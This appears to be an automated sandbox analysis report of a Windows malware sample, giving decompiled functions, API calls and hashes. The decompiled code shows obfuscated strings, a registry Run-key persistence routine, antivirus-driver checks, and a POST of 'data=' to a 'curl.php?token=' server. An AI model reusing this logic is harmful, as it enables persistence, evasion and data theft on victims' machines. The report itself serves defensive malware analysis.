                                        • Instruction Fuzzy Hash: 2551803010A658B6DB237F619C8BFDF3B58FFC6304F010064FA14280569BA99256DFBA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC64E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				char _v64;
                                        				short _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				char _v124;
                                        				struct _SECURITY_ATTRIBUTES _v136;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t45;
                                        				void* _t49;
                                        				void* _t57;
                                        				CHAR* _t64;
                                        				void* _t66;
                                        
                                        				_v64 = 0x73006e;
                                        				_t57 = __edx;
                                        				_v8 = 0;
                                        				_t64 = __ecx;
                                        				_v68 = 0;
                                        				_v60 = 0x6f006c;
                                        				_t43 =  !=  ?  &_v124 :  &_v64;
                                        				_v56 = 0x6b006f;
                                        				_a4 =  !=  ?  &_v124 :  &_v64;
                                        				_v52 = 0x700075;
                                        				_v48 = 0x250020;
                                        				_v44 = 0x200053;
                                        				_v40 = 0x6e0064;
                                        				_v36 = 0x310073;
                                        				_v32 = 0x73002e;
                                        				_v28 = 0x70006f;
                                        				_v24 = 0x6f0072;
                                        				_v20 = 0x6e0064;
                                        				_v16 = 0x2e0073;
                                        				_v12 = 0x750072;
                                        				_v124 = 0x73006e;
                                        				_v120 = 0x6f006c;
                                        				_v116 = 0x6b006f;
                                        				_v112 = 0x700075;
                                        				_v108 = 0x250020;
                                        				_v104 = 0x200053;
                                        				_v100 = 0x6e0064;
                                        				_v96 = 0x320073;
                                        				_v92 = 0x73002e;
                                        				_v88 = 0x70006f;
                                        				_v84 = 0x6f0072;
                                        				_v80 = 0x6e0064;
                                        				_v76 = 0x2e0073;
                                        				_v72 = 0x750072;
                                        				_v136.nLength = 0xc;
                                        				_v136.bInheritHandle = 1;
                                        				_v136.lpSecurityDescriptor = 0;
                                        				_t45 = CreatePipe(0xfc72a70, 0xfc72a6c,  &_v136, 0); // executed
                                        				if(_t45 != 0) {
                                        					_t45 = SetHandleInformation( *0xfc72a70, 1, 0);
                                        					if(_t45 == 0) {
                                        						goto L1;
                                        					} else {
                                        						CreatePipe(0xfc72a68, 0xfc72a74,  &_v136, 0); // executed
                                        						_t45 = SetHandleInformation( *0xfc72a74, 1, 0);
                                        						if(_t45 == 0) {
                                        							goto L1;
                                        						} else {
                                        							_t49 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
                                        							_t66 = _t49;
                                        							if(_t66 == 0) {
                                        								lstrcpyA(_t64, "fabian wosar <3");
                                        								return 0;
                                        							} else {
                                        								wsprintfW(_t66, _a4, _t57);
                                        								E0FC64C40(_t66); // executed
                                        								E0FC64DE0(_t57, _t64, _t57, _t64, _t66); // executed
                                        								VirtualFree(_t66, 0, 0x8000); // executed
                                        								return 0;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					return _t45 | 0xffffffff;
                                        				}
                                        			}
                                        0x0fc64e9d
                                        0x0fc64ea8
                                        0x0fc64eab
                                        0x0fc64eaf
                                        0x0fc64eb1
                                        0x0fc64ebb
                                        0x0fc64ec2
                                        0x0fc64ec5
                                        0x0fc64ece
                                        0x0fc64ee2
                                        0x0fc64ee9
                                        0x0fc64ef0
                                        0x0fc64ef7
                                        0x0fc64efe
                                        0x0fc64f05
                                        0x0fc64f0c
                                        0x0fc64f13
                                        0x0fc64f1a
                                        0x0fc64f21
                                        0x0fc64f28
                                        0x0fc64f2f
                                        0x0fc64f36
                                        0x0fc64f3d
                                        0x0fc64f44
                                        0x0fc64f4b
                                        0x0fc64f52
                                        0x0fc64f59
                                        0x0fc64f60
                                        0x0fc64f67
                                        0x0fc64f6e
                                        0x0fc64f75
                                        0x0fc64f7c
                                        0x0fc64f83
                                        0x0fc64f8a
                                        0x0fc64f91
                                        0x0fc64f9b
                                        0x0fc64fa2
                                        0x0fc64fa9
                                        0x0fc64fb1
                                        0x0fc64fcd
                                        0x0fc64fd1
                                        0x00000000
                                        0x0fc64fd3
                                        0x0fc64fe6
                                        0x0fc64ff6
                                        0x0fc64ffa
                                        0x00000000
                                        0x0fc64ffc
                                        0x0fc6500a
                                        0x0fc65010
                                        0x0fc65014
                                        0x0fc65051
                                        0x0fc6505f
                                        0x0fc65016
                                        0x0fc6501b
                                        0x0fc65026
                                        0x0fc6502f
                                        0x0fc6503c
                                        0x0fc6504a
                                        0x0fc6504a
                                        0x0fc65014
                                        0x0fc64ffa
                                        0x0fc64fb3
                                        0x0fc64fb3
                                        0x0fc64fbc
                                        0x0fc64fbc

                                        APIs
                                        • CreatePipe.KERNEL32(0FC72A70,0FC72A6C,?,00000000,00000001,00000001,00000000), ref: 0FC64FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FC64FCD
                                        • CreatePipe.KERNEL32(0FC72A68,0FC72A74,0000000C,00000000), ref: 0FC64FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FC64FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FC6500A
                                        • wsprintfW.USER32 ref: 0FC6501B
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: a97f865925521ebf83fab770653c6b975d0085a073a15dbae6d2e2e97b76d9ab
                                        • Instruction ID: 16e9c2b3d5200cdd31efff8416815c205337974bf0061f3264cc8b02a7bb3c2c
                                        • Opcode Fuzzy Hash: a97f865925521ebf83fab770653c6b975d0085a073a15dbae6d2e2e97b76d9ab
                                        • Instruction Fuzzy Hash: 0F416070A44319EBEB10CF91EC4A7EDBFB5FB04755F104129E604AA281CBFA4558CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 94%
                                        			E0FC62960(WCHAR* __ecx, void* __eflags) {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v32;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				short _v140;
                                        				long _t45;
                                        				WCHAR* _t58;
                                        
                                        				_t58 = __ecx;
                                        				_v32 = 0x520050;
                                        				_v28 = 0x440049;
                                        				_push(0x41);
                                        				_v24 = 0x520055;
                                        				_v20 = 0x530041;
                                        				_v16 = 0x4b0048;
                                        				_v12 = 0x41;
                                        				E0FC68150( &_v32, lstrlenW( &_v32)); // executed
                                        				_v140 = 0x4f0053;
                                        				_v136 = 0x540046;
                                        				_v132 = 0x410057;
                                        				_v128 = 0x450052;
                                        				_v124 = 0x4d005c;
                                        				_v120 = 0x630069;
                                        				_v116 = 0x6f0072;
                                        				_v112 = 0x6f0073;
                                        				_v108 = 0x740066;
                                        				_v104 = 0x57005c;
                                        				_v100 = 0x6e0069;
                                        				_v96 = 0x6f0064;
                                        				_v92 = 0x730077;
                                        				_v88 = 0x43005c;
                                        				_v84 = 0x720075;
                                        				_v80 = 0x650072;
                                        				_v76 = 0x74006e;
                                        				_v72 = 0x650056;
                                        				_v68 = 0x730072;
                                        				_v64 = 0x6f0069;
                                        				_v60 = 0x5c006e;
                                        				_v56 = 0x750052;
                                        				_v52 = 0x4f006e;
                                        				_v48 = 0x63006e;
                                        				_v44 = 0x65;
                                        				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
                                        				if(_t45 != 0) {
                                        					return 0;
                                        				} else {
                                        					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
                                        					asm("sbb esi, esi"); // executed
                                        					RegCloseKey(_v8);
                                        					_t39 =  &(_t58[0]); // 0x1
                                        					return _t39;
                                        				}
                                        			}


                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0FC6299D
                                          • Part of subcall function 0FC68150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                          • Part of subcall function 0FC68150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                          • Part of subcall function 0FC68150: GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                          • Part of subcall function 0FC68150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                          • Part of subcall function 0FC68150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                          • Part of subcall function 0FC68150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                          • Part of subcall function 0FC68150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FC62C45,00000000), ref: 0FC62A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC62A8F
                                        • RegSetValueExW.KERNEL32(0FC62C45,00520050,00000000,00000001,00000000,00000000), ref: 0FC62AA4
                                        • RegCloseKey.KERNEL32(0FC62C45), ref: 0FC62AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: ddaa761fa3fb9a38e59fef6d8585c9bc5fcc0dc7bff3ee41ac7bbe6f108062c5
                                        • Instruction ID: 1be193926ebe30bac87ef55a1e6d5b67e48c5d8b9762971cbb698ddad71c5fe7
                                        • Opcode Fuzzy Hash: ddaa761fa3fb9a38e59fef6d8585c9bc5fcc0dc7bff3ee41ac7bbe6f108062c5
                                        • Instruction Fuzzy Hash: C231F9B090421DDFEB20CF91E949BEDBFB9FB01709F108119D6187A281D7BA49488F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 85%
                                        			E0FC62D30() {
                                        				struct _WNDCLASSEXW _v52;
                                        				struct tagMSG _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				char _v96;
                                        				void* _t37;
                                        				short _t42;
                                        				void* _t49;
                                        				void* _t59;
                                        				void* _t60;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t67;
                                        				void* _t69;
                                        				long _t71;
                                        
                                        				_push(_t62);
                                        				_push(_t69);
                                        				_v84.message = 0x6c006b;
                                        				_push(_t67);
                                        				_v84.wParam = 0x660069;
                                        				_v84.lParam = 0x73002e;
                                        				_v84.time = 0x730079;
                                        				_v84.pt = 0;
                                        				_v96 = 0x6c006b;
                                        				_v92 = 0x2e0031;
                                        				_v88 = 0x790073;
                                        				_v84.hwnd = 0x73;
                                        				_t37 = E0FC62F50( &(_v84.message)); // executed
                                        				if(_t37 != 0) {
                                        					L5:
                                        					_v52.cbSize = 0x30;
                                        					_v52.style = 3;
                                        					_v52.lpfnWndProc = E0FC62C50;
                                        					_v52.cbClsExtra = 0;
                                        					_v52.cbWndExtra = 0;
                                        					_v52.hInstance = GetModuleHandleW(0);
                                        					_v52.hIcon = 0;
                                        					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                        					_v52.hbrBackground = 6;
                                        					_v52.lpszMenuName = 0;
                                        					_v52.lpszClassName = L"win32app";
                                        					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                        					_t42 = RegisterClassExW( &_v52);
                                        					_push(0);
                                        					if(_t42 != 0) {
                                        						GetModuleHandleW();
                                        						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                        						SetWindowLongW(_t71, 0xfffffff0, 0);
                                        						if(_t71 != 0) {
                                        							ShowWindow(_t71, 5);
                                        							UpdateWindow(_t71);
                                        							_t49 = CreateThread(0, 0, E0FC62D10, _t71, 0, 0);
                                        							if(_t49 != 0) {
                                        								CloseHandle(_t49);
                                        							}
                                        							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
                                        								L15:
                                        								ExitThread(0);
                                        							} else {
                                        								do {
                                        									TranslateMessage( &_v84);
                                        								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                        								goto L15;
                                        							}
                                        						}
                                        						ExitThread(_t71);
                                        					}
                                        					ExitThread();
                                        				}
                                        				_t59 = E0FC62F50( &_v96); // executed
                                        				if(_t59 != 0) {
                                        					goto L5;
                                        				}
                                        				_v84.message = 0x730066;
                                        				_v84.wParam = 0x660064;
                                        				_v84.lParam = 0x2e0077;
                                        				_v84.time = 0x790073;
                                        				_v84.pt = 0x73;
                                        				_t60 = E0FC62F50( &(_v84.message)); // executed
                                        				if(_t60 != 0) {
                                        					goto L15;
                                        				}
                                        				_t61 = E0FC630A0(_t62, _t67, _t69); // executed
                                        				if(_t61 != 0) {
                                        					goto L15;
                                        				}
                                        				_push(_t61); // executed
                                        				E0FC62AD0(); // executed
                                        				goto L5;
                                        			}

                                        APIs
                                          • Part of subcall function 0FC62F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FC62F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FC62E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0FC62E2E
                                        • LoadIconW.USER32 ref: 0FC62E59
                                        • RegisterClassExW.USER32 ref: 0FC62E68
                                        • ExitThread.KERNEL32 ref: 0FC62E75
                                          • Part of subcall function 0FC62F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FC62F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FC62E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FC62E81
                                        • CreateWindowExW.USER32 ref: 0FC62EA7
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0FC62EB4
                                        • ExitThread.KERNEL32 ref: 0FC62EBF
                                          • Part of subcall function 0FC62F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FC62FA8
                                          • Part of subcall function 0FC62F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FC62FCF
                                          • Part of subcall function 0FC62F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FC62FE3
                                          • Part of subcall function 0FC62F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC62FFA
                                        • ExitThread.KERNEL32 ref: 0FC62F3F
                                          • Part of subcall function 0FC62AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FC62AEA
                                          • Part of subcall function 0FC62AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC62B2C
                                          • Part of subcall function 0FC62AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FC62B38
                                          • Part of subcall function 0FC62AD0: ExitThread.KERNEL32 ref: 0FC62C47
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FC62EC8
                                        • UpdateWindow.USER32(00000000), ref: 0FC62ECF
                                        • CreateThread.KERNEL32 ref: 0FC62EE3
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FC62EEE
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FC62F05
                                        • TranslateMessage.USER32(?), ref: 0FC62F1C
                                        • DispatchMessageW.USER32 ref: 0FC62F23
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FC62F37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                        • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                        • API String ID: 3011903443-520298170
                                        • Opcode ID: b6e0afab878248b59fab59001a4689a0647b2affe35ee171694956641241e16e
                                        • Instruction ID: 5f4fb9972d9380da0177069976e791621e14974c846b4b38f5e0b9738920ad79
                                        • Opcode Fuzzy Hash: b6e0afab878248b59fab59001a4689a0647b2affe35ee171694956641241e16e
                                        • Instruction Fuzzy Hash: 4F51507054C302EFE7109F618C4AB9B7BE4AF44B59F10451CF784AA181E7B8A549CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 35%
                                        			E0FC654A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                        				CHAR* _v12;
                                        				void* _v16;
                                        				CHAR** _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				void* _v32;
                                        				char _v36;
                                        				short _v136;
                                        				char _v1156;
                                        				short _v1160;
                                        				void* _t31;
                                        				int _t45;
                                        				void* _t53;
                                        				CHAR* _t57;
                                        				CHAR* _t59;
                                        				CHAR* _t60;
                                        				void* _t61;
                                        				void* _t70;
                                        				short _t71;
                                        
                                        				_t59 = __ecx;
                                        				_v20 = __edx;
                                        				_v12 = __ecx;
                                        				E0FC67CE0( &_v36); // executed
                                        				_t31 = E0FC65060(); // executed
                                        				_v24 = _t31;
                                        				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                        				_t7 = _t70 + 1; // 0x74cb6981
                                        				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                        				_v28 = _t60;
                                        				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                        				if(_t60 == 0) {
                                        					L2:
                                        					_t60 = 0;
                                        					L3:
                                        					lstrcatA(_t60, "data=");
                                        					lstrcatA(_t60, _v12);
                                        					asm("movdqu xmm0, [0xfc6fb20]");
                                        					asm("movdqu [ebp-0x84], xmm0");
                                        					asm("movdqu xmm0, [0xfc6fb30]");
                                        					asm("movdqu [ebp-0x74], xmm0");
                                        					asm("movdqu xmm0, [0xfc6fb40]");
                                        					asm("movdqu [ebp-0x64], xmm0");
                                        					asm("movdqu xmm0, [0xfc6fb50]");
                                        					asm("movdqu [ebp-0x54], xmm0");
                                        					asm("movdqu xmm0, [0xfc6fb60]");
                                        					asm("movdqu [ebp-0x44], xmm0");
                                        					asm("movdqu xmm0, [0xfc6fb70]");
                                        					asm("movdqu [ebp-0x34], xmm0");
                                        					lstrlenA(_t60);
                                        					_t71 = 0;
                                        					_v1160 = 0;
                                        					E0FC69010( &_v1156, 0, 0x3fc);
                                        					lstrcpyW( &_v1160, L"curl.php?token=");
                                        					E0FC653A0( &_v1160);
                                        					_t45 = lstrlenW( &_v136);
                                        					_t74 = _v16;
                                        					_push(_t45);
                                        					_push( &_v136);
                                        					_push(L"POST");
                                        					_push(0x31fff);
                                        					_push(_v16);
                                        					_push(lstrlenA(_t60));
                                        					_push(_t60);
                                        					_t61 = _v24;
                                        					_push( &_v1160);
                                        					_push(_t61);
                                        					if(E0FC67EF0( &_v36) != 0) {
                                        						_t71 = 1;
                                        						if(_a4 != 0) {
                                        							_v12 = 0;
                                        							if(E0FC65210(_t74,  &_v12) == 0) {
                                        								_t71 = 0;
                                        							} else {
                                        								_t57 = _v12;
                                        								if(_t57 != 0) {
                                        									 *_v20 = _t57;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					VirtualFree(_t61, 0, 0x8000);
                                        					VirtualFree(_v16, 0, 0x8000);
                                        					VirtualFree(_v28, 0, 0x8000);
                                        					_t53 = _v32;
                                        					if(_t53 != 0) {
                                        						InternetCloseHandle(_t53);
                                        					}
                                        					return _t71;
                                        				}
                                        				_t10 = _t70 + 1; // 0x74cb6981
                                        				if(_t70 < _t10) {
                                        					goto L3;
                                        				}
                                        				goto L2;
                                        			}

                                        APIs
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FC67EC4
                                          • Part of subcall function 0FC67CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FC67EDD
                                          • Part of subcall function 0FC65060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0FC650C6
                                          • Part of subcall function 0FC65060: Sleep.KERNEL32(000003E8), ref: 0FC65103
                                          • Part of subcall function 0FC65060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FC65111
                                          • Part of subcall function 0FC65060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FC65121
                                          • Part of subcall function 0FC65060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FC6513D
                                          • Part of subcall function 0FC65060: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6514E
                                          • Part of subcall function 0FC65060: wsprintfW.USER32 ref: 0FC65166
                                          • Part of subcall function 0FC65060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC65177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0FC654C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0FC654E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FC654FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0FC65518
                                        • lstrcatA.KERNEL32(00000000,0FC6582E), ref: 0FC6551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65572
                                        • _memset.LIBCMT ref: 0FC6558D
                                        • lstrcpyW.KERNEL32 ref: 0FC655A1
                                        • lstrlenW.KERNEL32(?), ref: 0FC655B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0FC655D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0FC65636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FC65642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FC6564E
                                        • InternetCloseHandle.WININET(?), ref: 0FC65658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: beb6ab04e4720079116f05463c6282b85d4c826f0f0a7b627ec33a129cbcc88f
                                        • Instruction ID: 7aefde4242032ebc8570e04734d527f0f28b3c76c14d566c88e40ed2c6d65c83
                                        • Opcode Fuzzy Hash: beb6ab04e4720079116f05463c6282b85d4c826f0f0a7b627ec33a129cbcc88f
                                        • Instruction Fuzzy Hash: BD51B671D0830AAADB109BA5DC82FEEBB7CFF88710F105555EB44B2241EF78A644CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 331 fc62ad0-fc62b00 VirtualAlloc 332 fc62b02-fc62b1a 331->332 333 fc62b1c-fc62b1e 331->333 334 fc62b20-fc62b4a GetModuleFileNameW GetTempPathW call fc68090 332->334 333->334 337 fc62b53-fc62bae lstrlenW call fc68150 GetEnvironmentVariableW call fc68090 334->337 338 fc62b4c-fc62b4e 334->338 346 fc62bb0-fc62bc4 337->346 347 fc62bd8-fc62bfd lstrcatW * 3 call fc62890 337->347 339 fc62c40 call fc62960 338->339 343 fc62c45-fc62c47 ExitThread 339->343 351 fc62bc6-fc62bd1 346->351 352 fc62bd3 346->352 350 fc62c02-fc62c07 347->350 350->343 353 fc62c09-fc62c1d 350->353 351->352 354 fc62bd5-fc62bd6 351->354 352->354 357 fc62c1f-fc62c2a 353->357 358 fc62c2c 353->358 355 fc62c2f-fc62c3d wsprintfW 354->355 355->339 357->358 359 fc62c2e 357->359 358->359 359->355
                                        C-Code - Quality: 93%
                                        			E0FC62AD0() {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				short _v20;
                                        				WCHAR* _v24;
                                        				WCHAR* _v28;
                                        				long _v32;
                                        				intOrPtr _v36;
                                        				WCHAR* _t24;
                                        				void* _t27;
                                        				WCHAR* _t33;
                                        				WCHAR* _t38;
                                        				signed int _t40;
                                        				signed int _t46;
                                        				WCHAR* _t50;
                                        				WCHAR* _t54;
                                        				void* _t56;
                                        				WCHAR* _t57;
                                        				void* _t58;
                                        				WCHAR* _t64;
                                        				WCHAR* _t65;
                                        				WCHAR* _t67;
                                        				signed int _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        
                                        				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                        				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
                                        				_v24 = _t24;
                                        				_t64 = _t24;
                                        				_v32 = 0;
                                        				if(_t24 == 0) {
                                        					_t67 = 0;
                                        					_t50 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t3 =  &(_t24[0x101]); // 0x202
                                        					_t65 = _t3;
                                        					_v32 = 0x404;
                                        					_t50 = _t65;
                                        					_t67 = _t24;
                                        					_t64 =  &(_t65[0x101]);
                                        				}
                                        				_v28 = _t67;
